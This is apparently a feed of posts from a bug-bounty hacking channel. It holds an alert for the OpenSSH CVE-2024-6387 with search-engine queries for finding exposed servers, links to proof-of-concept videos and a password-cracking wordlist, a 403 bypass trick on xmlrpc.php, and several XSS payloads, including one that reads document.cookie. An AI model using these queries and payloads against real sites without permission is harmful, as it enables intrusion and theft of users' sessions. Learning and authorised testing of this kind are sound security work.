haxshadow

🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.

👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"

🤮3❤1

1.3K views18:46

haxshadow

https://youtu.be/X38Ufox6eGI?si=yKLMyiEIWwGtarCu

YouTube

POC for CVE-2024-6387 Remote Code Execution | Bug bounty poc

// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can protect ourselves against the real hackers..…

❤2🤮1

1.37K views19:19

haxshadow

https://youtu.be/-zJNtZRaQ34

YouTube

POC for CVE-2024-36401 GeoServer Remote Code Execution | Bug bounty poc

❤3🤮1

1.34K views19:11

haxshadow

latest 2024 rockyou list for password cracking & bruteforcing dir https://t.co/7rW9Q9Nx0M

❤3🤮2

1.36K viewsedited 04:29

haxshadow

403 Forbidden Bypass
https://target.com/xmlrpc.php 403 ok
https://target.com////xmlrpc.php 200 ok

❤4👏4🤣3👍1💩1

1.25K views14:16

haxshadow

https://youtu.be/EUBhZOFAcxA

YouTube

stored xss that made 100$ Bounty | bug bounty poc

1.45K views17:17

haxshadow

https://youtu.be/EUBhZOFAcxA

XSS Payload

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><img src=x onerror=confirm(document.cookie)>

<sVg/onLy=1 onLoaD=confirm(1)//

1.52K views17:18

About

Blog

Apps

Platform